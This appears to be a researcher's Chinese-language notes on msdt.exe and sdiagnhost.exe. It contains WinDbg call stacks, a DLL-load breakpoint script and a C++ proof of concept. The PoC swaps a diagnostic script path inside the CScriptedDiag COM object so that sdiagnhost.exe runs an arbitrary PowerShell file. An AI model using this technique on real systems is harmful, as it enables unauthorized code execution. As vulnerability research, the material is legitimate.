fffffa80321fe420 Semaphore Limit 0x1
Waiting for reply to ALPC Message fffff8a006dbf6c0 : queued at port fffffa8032b13090 : owned by process fffffa803135f300
IRP List:
fffffa8032da9c60: (0006,03a0) Flags: 00060000 Mdl: 00000000
Not impersonating
DeviceMap fffff8a0012438b0
Owning Process fffffa80313ff7a0 Image: msdt.exe
Attached Process N/A Image: N/A
Wait Start TickCount 251709 Ticks: 0
Context Switch Count 277 IdealProcessor: 1 LargeStack
UserTime 00:00:00.171
KernelTime 00:00:00.639
Win32 Start Address msdt!WorkerThread (0x00000000ff5aa164)
Stack Init fffff88006c0cc70 Current fffff88006c0c330
Base fffff88006c0d000 Limit fffff88006c04000 Call 0000000000000000
Priority 10 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
fffff880`06c0c370 fffff800`028e8992 : fffff8a0`085a9a00 fffffa80`321fe060 fffff8a0`00000000 00000000`00020001 : nt!KiSwapContext+0x7a
fffff880`06c0c4b0 fffff800`028eb1af : 00000000`0000001c fffffa80`321fe060 fffffa80`00000000 fffff8a0`06fd1340 : nt!KiCommitThreadWait+0x1d2
fffff880`06c0c540 fffff800`0290575f : 00000000`00000000 fffff800`00000011 00000000`00020001 fffff8a0`06fd1300 : nt!KeWaitForSingleObject+0x19f
fffff880`06c0c5e0 fffff800`02bf3376 : 00000000`00000000 fffffa80`321fe420 00000000`00000001 00000000`00000000 : nt!AlpcpSignalAndWait+0x8f
fffff880`06c0c690 fffff800`02bf2a70 : 00000000`00000000 00000000`03e725c0 00000000`03e77a88 63536553`00000701 : nt!AlpcpReceiveSynchronousReply+0x46
fffff880`06c0c6f0 fffff800`02bf086b : fffffa80`334e5af0 fffffa80`00020000 00000000`03e725c0 00000000`03e77a88 : nt!AlpcpProcessSynchronousRequest+0x33d
fffff880`06c0c830 fffff880`04027b86 : 00000000`00000000 fffff880`06c0cb60 fffff880`06c0c920 00000000`00000000 : nt!NtAlpcSendWaitReceivePort+0x1ab
fffff880`06c0c8e0 fffff800`028e28d3 : fffffa80`321fe060 00000000`028ae688 fffff880`04027a8c 00000000`03e77a88 : 360Hvm64+0x17b86
fffff880`06c0ca70 00000000`77491b6a : 000007fe`fdc2a776 00000000`00000000 00000000`03e73820 00000000`028ae8a0 : nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`06c0cae0)
00000000`028ae668 000007fe`fdc2a776 : 00000000`00000000 00000000`03e73820 00000000`028ae8a0 00000000`01dc0208 : ntdll!NtAlpcSendWaitReceivePort+0xa
00000000`028ae670 000007fe`fdc24e42 : 00000000`03e11470 00000000`01e20800 00000000`0302a2d0 00000000`028ae8a0 : RPCRT4!LRPC_CCALL::SendReceive+0x156
00000000`028ae730 000007fe`fe3b28c0 : 00000000`002b9940 00000000`002b9940 00000000`03e73790 00000000`02fe0ad0 : RPCRT4!I_RpcSendReceive+0x42
00000000`028ae760 000007fe`fe3b282f : 00000000`00000000 00000000`002b9940 00000000`03e73790 00000000`03e73820 : ole32!ThreadSendReceive+0x40 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 5003]
00000000`028ae7b0 000007fe`fe3b265b : 00000000`00000000 00000000`03e73790 00000000`003bea9d 000007fe`ffffffff : ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa3 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4454]
00000000`028ae850 000007fe`fe26daaa : 00007990`b77d4ecb 00000000`002b9940 00000000`00000100 000007fe`fe418810 : ole32!CRpcChannelBuffer::SendReceive2+0x11b [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4074]
00000000`028aea10 000007fe`fe26da0c : 00000000`00000000 00000001`55535243 00000000`03e851a2 00000000`002b9940 : ole32!CAptRpcChnl::SendReceive+0x52 [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603]
00000000`028aeae0 000007fe`fe3b205d : 00000000`028aed40 00000000`00000000 00000000`00000000 00000000`03e62f28 : ole32!CCtxComChnl::SendReceive+0x68 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734]
00000000`028aeb90 000007fe`fdccfd61 : 00000000`03e84b78 00000000`00000000 00000000`03e62f28 00000000`01e2b3c0 : ole32!NdrExtpProxySendReceive+0x45 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932]
00000000`028aebc0 000007fe`fe3af82f : 00000000`03e7d570 00000000`7749413d 00000000`01dc0000 00000000`02000002 : RPCRT4!NdrpClientCall2+0x9ea
00000000`028af330 000007fe`fe26d8a2 : 00000000`00000000 00000000`00000000 00000000`03e62f28 000007fe`fe310cf6 : ole32!ObjectStublessClient+0x1ad [d:\w7rtm\com\rpc\ndrole\amd64\stblsclt.cxx @ 620]
00000000`028af6c0 000007fe`f8f9cb68 : 00000000`03e62f28 00000000`002a5ab8 00000000`03e660e0 00000000`03e66130 : ole32!ObjectStubless+0x42 [d:\w7rtm\com\rpc\ndrole\amd64\stubless.asm @ 117]
00000000`028af710 000007fe`f8f980fe : 00000000`00000000 00000000`00000000 00000000`03e660e0 00000000`03e66130 : sdiageng!Script::Run+0x264 //重点
00000000`028af7a0 000007fe`f8f94418 : 00000000`00000000 00000000`00000000 00000000`028af8a8 00000000`0021e03a : sdiageng!Rootcause::Resolve+0x162
00000000`028af800 000007fe`f8f8f942 : 00000000`00000000 00000000`03e195e8 00000000`0021e950 00000000`028af8c0 : sdiageng!DiagPackage::Resolve+0x88
00000000`028af840 00000000`ff592f5e : 00000000`00000004 00000000`028af9b0 00000000`00000005 00000000`0021e950 : sdiageng!CScriptedDiag::Resolve+0x296 //重点
00000000`028af8f0 00000000`ff593110 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`002199d0 : msdt!SDEngine::Resolve+0xa2
00000000`028af930 00000000`ff592da1 : 00000000`00000000 00000000`00000000 00000000`00000001 00000000`00000000 : msdt!SDEngine::ResolveAndVerifyResolution+0x170
00000000`028af9a0 00000000`ff5aa72c : 00000000`00395cf0 00000000`00395cf0 00000000`00000000 00000000`00000000 : msdt!SDEngine::Resolve+0x265
00000000`028afa30 00000000`7733652d : 00000000`00000000 00000000`00000001 00000000`002199d0 00000000`0021a750 : msdt!WorkerThread+0x5c8
00000000`028afaa0 00000000`7746c521 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`028afad0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
sendmessage:
服务端:
THREAD fffffa8032d6e060 Cid 0a60.0824 Teb: 000007fffffda000 Win32Thread: fffff900c1fed010 RUNNING on processor 1
Not impersonating
DeviceMap fffff8a0012438b0
Owning Process fffffa803135f300 Image: sdiagnhost.exe
Attached Process N/A Image: N/A
Wait Start TickCount 251709 Ticks: 1 (0:00:00:00.015)
Context Switch Count 559 IdealProcessor: 0 LargeStack
UserTime 00:00:00.748
KernelTime 00:00:00.483
Win32 Start Address ntdll!TppWorkerThread (0x000000007745fbc0)
Stack Init fffff88006dd3c70 Current fffff88006dd3680
Base fffff88006dd4000 Limit fffff88006dcb000 Call 0000000000000000
Priority 9 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
00000000`003ae578 000007fe`fdc223d5 : 00000000`0022ff40 00000000`0043df68 00000000`1af5db50 00000000`1af728c0 : sdiagnhost!CScriptedDiagNativeHost::RunScript+0x3 //重点
00000000`003ae580 000007fe`fdc169b2 : 00000000`003ae9b0 00000000`00443b00 00000000`00000030 00000000`00443ab4 : RPCRT4!Invoke+0x65
00000000`003ae5e0 000007fe`fe3af16e : 00000000`00422d70 00000000`00000001 00000000`00000000 00000000`003aec88 : RPCRT4!NdrStubCall2+0x32a
00000000`003aec00 000007fe`fe0710b4 : 00000000`00000001 00000000`004343c0 00000000`00422d70 00000000`004343c0 : ole32!CStdStubBuffer_Invoke+0x8b [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1559]
00000000`003aec30 000007fe`fe3b0ccd : 00000000`00000000 00000000`0040c2b0 00000000`00000000 00000000`00000000 : OLEAUT32!CUnivStubWrapper::Invoke+0xe4
00000000`003aec80 000007fe`fe3b0c43 : 00000000`004314f0 00000000`0043c2f4 00000000`00433500 00000000`ffa215c8 : ole32!SyncStubInvoke+0x5d [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187]
00000000`003aecf0 000007fe`fe26a4f0 : 00000000`004314f0 00000000`00431060 00000000`004314f0 00000000`003e0000 : ole32!StubInvoke+0xdb [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396]
00000000`003aeda0 000007fe`fe3b14d6 : 00000000`00000000 00000000`00000010 00000000`004343c0 00000000`00422d70 : ole32!CCtxComChnl::ContextInvoke+0x190 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262]
00000000`003aef30 000007fe`fe3b122b : 00000000`d0908070 00000000`00431060 00000000`00431650 00000000`00422650 : ole32!AppInvoke+0xc2 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086]
00000000`003aefa0 000007fe`fe3afd6d : 00000000`00431060 00000000`00431060 00000000`00422d70 00000000`00070005 : ole32!ComInvokeWithLockAndIPID+0x52b [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1727]
00000000`003af130 000007fe`fdc150f4 : 000007fe`fe419930 00000000`00000000 00000000`0043d820 000007fe`fdc0e8f7 : ole32!ThreadInvoke+0x30d [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4751]
00000000`003af1d0 000007fe`fdc14f56 : 000007fe`fe3c0ab0 00000000`00000001 00000000`003af440 000007fe`fe248ffc : RPCRT4!DispatchToStubInCNoAvrf+0x14
00000000`003af200 000007fe`fdc1775b : 00000000`0043c2d0 00000000`00000000 00000000`003af524 00000000`0043c2d0 : RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x146
00000000`003af320 000007fe`fdc1769b : 00000000`00000000 00000000`003af440 00000000`003af440 00000000`0043d820 : RPCRT4!RPC_INTERFACE::DispatchToStub+0x9b
00000000`003af360 000007fe`fdc17632 : 00000000`0043c2d0 00000000`0043c2d0 00000000`0043c2d0 000007fe`fdc16140 : RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x5b
00000000`003af3e0 000007fe`fdc1532d : 00000000`00000001 00000000`00000000 000007fe`fdbf0000 00000000`0043c2d0 : RPCRT4!LRPC_SCALL::DispatchRequest+0x422
00000000`003af4c0 000007fe`fdc32e7f : 00000000`00010000 00000000`0041dc80 00000000`00000000 00000000`00000001 : RPCRT4!LRPC_SCALL::HandleRequest+0x20d
00000000`003af5f0 000007fe`fdc32a35 : 00000000`00000000 00000000`00000000 00000000`0041dd80 00000000`00000000 : RPCRT4!LRPC_ADDRESS::ProcessIO+0x3bf
00000000`003af730 00000000`7745b68b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RPCRT4!LrpcIoComplete+0xa5
00000000`003af7c0 00000000`7745feff : 00000000`00000000 00000000`00000000 00000000`0000ffff 00000000`00000000 : ntdll!TppAlpcpExecuteCallback+0x26b
00000000`003af850 00000000`7733652d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!TppWorkerThread+0x3f8
00000000`003afb50 00000000`7746c521 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`003afb80 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
可能用到的调试脚本:
效果和3环调试的时候用“sxe ld”命令差不多(因为是靠DbgkMapViewOfSection实现的),可用于内核调试过滤全局dll加载 ba e1 nt!DbgkMapViewOfSection "$$><【your script path】"
$$ Script body run from the nt!DbgkMapViewOfSection breakpoint quoted above.
$$ ${DLLPath} is an alias presumably set by an unshown part of the script
$$ from the path of the section being mapped - confirm before relying on it.
.block{
$$ Wildcard match against the module of interest (here reseteng.dll).
.if($spat("${DLLPath}","*reseteng.dll*")){
.echo [*] Block: ${DLLPath};
$$ Delete every alias so stale values do not leak into the next hit, then
$$ show the thread that is mapping the image and stay broken in.
ad*;
!thread;
}
.else{
.echo [*] Pass: ${DLLPath};
$$ Not the target - clear aliases and resume from the conditional breakpoint.
ad*;
gc;
}
}
exp:使用“/p”选项可针对特定进程
其他
THREAD ffffd50ae7232080 Cid 10f4.04bc Teb: 0000008cb4663000 Win32Thread: 0000000000000000 RUNNING on processor 0
Not impersonating
DeviceMap ffff980cbda8c6f0
Owning Process ffffd50ae7db3080 Image: msdt.exe
Attached Process N/A Image: N/A
Wait Start TickCount 17607 Ticks: 1 (0:00:00:00.015)
Context Switch Count 9 IdealProcessor: 3
UserTime 00:00:00.000
KernelTime 00:00:00.015
Win32 Start Address msdt!WorkerThread (0x00007ff6401d6630)
Stack Init ffffe509d1c1f650 Current ffffe509d1c1f060
Base ffffe509d1c20000 Limit ffffe509d1c19000 Call 0000000000000000
Priority 11 BasePriority 8 PriorityDecrement 2 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
0000008c`b4a7f998 00007ff6`401f0473 : 00000000`00000000 000001f2`47e665f0 000001f2`47c4cdd8 000001f2`47c4fd40 : sdiageng!CScriptedDiag::Initialize+0x3 //重点
0000008c`b4a7f9a0 00007ff6`401f1037 : 00000000`00000000 000001f2`47e6d7f0 0000008c`b4a7fa70 000001f2`4d1c53c8 : msdt!PackageCollection::InitializePackage+0x1cb
0000008c`b4a7fa00 00007ff6`401ef17b : 00000000`00000000 000001f2`47e665f0 000001f2`47c39e08 00000000`00000001 : msdt!PackageCollection::LoadConfigFile+0x43b
0000008c`b4a7faa0 00007ff6`401e5ba2 : 00000000`00000000 000001f2`47c50160 0000008c`b4a7fb20 0000008c`b4a7fb20 : msdt!PackageCollection::AddPackageConfig+0xcb
0000008c`b4a7faf0 00007ff6`401d89cd : 00000000`00000001 00000000`00000000 00000000`00000000 000001f2`47e66650 : msdt!Packages_Load+0x15a
0000008c`b4a7fb60 00007ff6`401d6c4d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msdt!SkipIntro+0x11
0000008c`b4a7fba0 00007ffe`8bb57034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msdt!WorkerThread+0x61d
0000008c`b4a7fc00 00007ffe`8c0a2651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000008c`b4a7fc30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
可见参数是:
PoC:
#include <stdio.h>
#include <stdlib.h>
#include <wincrypt.h>
#include <iostream>
#include <process.h>
#include <tchar.h>
#include <strsafe.h>
#include <atlstr.h>
#pragma warning(disable:4996)
//////////////////////////////////////////////////////////
// Prototype of a DLL's exported DllGetClassObject.  In the visible code it
// is only used to type Worker2's pfnDllGetClassObject local, which is set
// to NULL and never called - the object is obtained via CoCreateInstance.
typedef
HRESULT(__stdcall* PFN_DllGetClassObject)(const IID* const rclsid, const IID* const riid, LPVOID* ppv);
// CLSID {1F3D8AA5-9EBF-4EE4-85C2-EA40379AEDE8}: the coclass the author names
// CScriptedDiag; Worker2 below creates it with CoCreateInstance.
const CLSID CLSID_CScriptedDiag = { 0x1F3D8AA5, 0x9EBF, 0x4EE4, { 0x85, 0xC2, 0xEA, 0x40, 0x37, 0x9A, 0xED, 0xE8 } };
// IID {6D5E9074-62EF-4F05-902A-46ECDFF1EF68}: the interface Worker2 requests
// from that coclass and then calls through raw vtable indices.
const IID IID_IScriptedDiagnosticExecution = { 0x6D5E9074, 0x62EF, 0x4F05, { 0x90, 0x2A, 0x46, 0xEC, 0xDF, 0xF1, 0xEF, 0x68 } };
// Class-factory-style interface as declared by the author.  The GUID string
// repeats CLSID_CScriptedDiag rather than a distinct IID, and nothing in the
// visible code instantiates or calls this interface, so it is informational.
MIDL_INTERFACE("1F3D8AA5-9EBF-4EE4-85C2-EA40379AEDE8")
IScriptedDiagFactory : public IUnknown{
// NOTE(review): declaration order is vtable order; the two methods mirror
// IClassFactory's shape - presumably the author's reconstruction, unverified.
STDMETHOD(CreateInstance) (IUnknown*,_GUID const&,PVOID*);
STDMETHOD(LockServer) (int);
};
//////////////////////////////////////////////////////////
// Answers document passed as the last argument of the call the author labels
// Initialize: an empty <Answers> element, so the XML itself supplies no values.
WCHAR g_pwszFormatOfXML[] = L"<?xml version=\"1.0\" encoding=\"utf-8\"?><Answers Version=\"1.0\"></Answers>";
// Directory of the PCW diagnostic package, passed as that call's first argument.
WCHAR g_pwszSdpPath[] = L"C:\\Windows\\diagnostics\\system\\PCW";
// BSTR copies of the two strings above; filled in by InitBstr(), never freed.
BSTR g_bstrSdpDir = NULL, g_bstrXML = NULL;
//////////////////////////////////////////////////////////
_inline
VOID InitBstr()
{
    // Allocate the two BSTRs the worker hands to the COM object: the PCW
    // package directory and the empty <Answers> document.  Both are
    // process-lifetime globals; nothing in this file frees them.
    g_bstrSdpDir = SysAllocString(g_pwszSdpPath);
    g_bstrXML = SysAllocString(g_pwszFormatOfXML);
}
// Content written to result.ps1 by Worker2.  Its only action is an IEX of
// the literal "notepad.exe", i.e. a visible marker that the host ran the file;
// the launched process is the observable effect on the test machine.
const char g_byScript[] = "function Read-MessageBoxDialog\n\
{\n\
IEX(\"notepad.exe\")\n\
}\n\
Read-MessageBoxDialog";
// Full path of that .ps1.  Allocated in Worker2, then stored into the COM
// object's private state by a raw-offset write; never freed in the visible code.
BSTR g_bstrScriptPath;
// Worker thread of the PoC.  Sequence, as the author built it:
//   1. create the CScriptedDiag object and call what the author labels
//      Initialize with the PCW package directory and an empty <Answers> XML;
//   2. read a path out of the object's private state, write result.ps1 under
//      it, and overwrite the object's stored script path with that file;
//   3. call the method the author labels Diagnose, which per the author's
//      comment (and the sdiagnhost RunScript call stack earlier on the page)
//      is where sdiagnhost.exe is asked to run the script.
// Every access past CoCreateInstance goes through raw vtable indices and
// field offsets, so it is tied to one build of the implementing module
// (sdiageng.dll per the call stack above).
// Defender's view: the artifacts are a process other than msdt.exe writing
// result.ps1 under the diagnostic working directory, followed by
// sdiagnhost.exe executing that file - presumably not a pairing that a normal
// troubleshooter run produces; confirm against a baseline before alerting.
unsigned __stdcall Worker2(void*)
{
HRESULT hr;
// Declared and zeroed but never used below.
PFN_DllGetClassObject pfnDllGetClassObject = NULL;
// Also unused: the object is created straight into pScriptedDiag.
PVOID pScriptedDiagFactory = NULL;
PVOID pScriptedDiag = NULL;
BSTR bstrString = NULL;
PWCHAR pwszTempSDIAGPath = NULL;
WCHAR wszPsPath[MAX_PATH];
FILE* pFile = NULL;
// Multithreaded apartment for this thread.
CoInitializeEx(NULL, COINIT_MULTITHREADED);
hr = CoCreateInstance(
CLSID_CScriptedDiag,
NULL,
CLSCTX_ALL,
IID_IScriptedDiagnosticExecution,
&pScriptedDiag);
// hr < 0 is FAILED(hr) spelled out (HRESULT is a signed 32-bit value).
if (hr < 0)
{
printf("[!] error0 | hr: %08x\n", hr);
goto __end1;
}
// Initialize: vtable slot 7, called as (this, package dir, NULL, answers XML).
// The prototype is the author's reconstruction - not verifiable from here.
hr = ((HRESULT(__stdcall*)(PVOID, BSTR, PVOID, BSTR))(PVOID)((PULONG_PTR)(*(PULONG_PTR)pScriptedDiag))[7])(
pScriptedDiag, g_bstrSdpDir, NULL, g_bstrXML);
if (hr < 0)
{
printf("[!] error1 | hr: %08x\n", hr);
goto __end1;
}
// Pull a wide-char path out of the object's state by raw offsets
// (field 3 -> field 3); the author treats it as the temp SDIAG path.
// NOTE(review): layout-dependent and not checked for NULL before use.
pwszTempSDIAGPath = (PWCHAR)(((PULONG_PTR)((PULONG_PTR)pScriptedDiag)[3])[3]);
// Strip the last path component, then build "<dir>\result\result.ps1".
PathRemoveFileSpec(pwszTempSDIAGPath);
// MAX_PATH * 2 is the buffer size in bytes (MAX_PATH WCHARs), as StringCb* expects.
StringCbPrintf((STRSAFE_LPWSTR)wszPsPath, MAX_PATH * 2, L"%s\\result\\result.ps1", pwszTempSDIAGPath);
g_bstrScriptPath = SysAllocString(wszPsPath);
// NOTE(review): _wfopen's result is not checked; if the directory is missing
// or not writable, fwrite dereferences NULL.  This file is the on-disk
// artifact a defender would look for.
pFile = _wfopen(wszPsPath, L"w+");
fwrite(g_byScript, 1, strlen(g_byScript), pFile);
fclose(pFile);
// Notice here: by replacing the script path, I can still execute any script.
// Replace the script path: overwrite the pointer at object->[4]->[2]->[1]->[1]
// with our BSTR (another raw-offset write tied to this build's object layout).
((PULONG_PTR)((PULONG_PTR)((PULONG_PTR)((PULONG_PTR)pScriptedDiag)[4])[2])[1])[1] = (ULONG_PTR)g_bstrScriptPath;
// Diagnose (vtable slot 18): per the author, starts the sdiagnhost.exe service
// and executes the script (whose path was swapped just above).
// The out-param BSTR bstrString is never freed.
hr = ((HRESULT(__stdcall*)(PVOID, BSTR*))(PVOID)((PULONG_PTR)(*(PULONG_PTR)pScriptedDiag))[18])(
pScriptedDiag, &bstrString);
if (hr < 0)
{
printf("[!] error2 | hr: %08x\n", hr);
goto __end1;
}
__end1:
// NOTE(review): pScriptedDiag is never Release()d and g_bstrScriptPath is
// never freed; harmless for a one-shot PoC but worth knowing when reading it.
CoUninitialize();
return 0;
}
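int
APIENTRY
_tWinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow
)
{
    // Entry point of the PoC.  Allocates the global BSTRs, runs Worker2 on a
    // dedicated thread and blocks until it finishes.  The four standard
    // parameters are unused.  Returns 0 on success, 1 if the thread could not
    // be created.
    HANDLE hThread = NULL;
    InitBstr();
    hThread = (HANDLE)_beginthreadex(NULL, 0, Worker2, NULL, 0, 0);
    // _beginthreadex returns 0 on failure; the original waited on that NULL
    // handle (a silently failing WaitForSingleObject) and never closed the
    // handle it did get.
    if (hThread == NULL)
    {
        return 1;
    }
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    return 0;
}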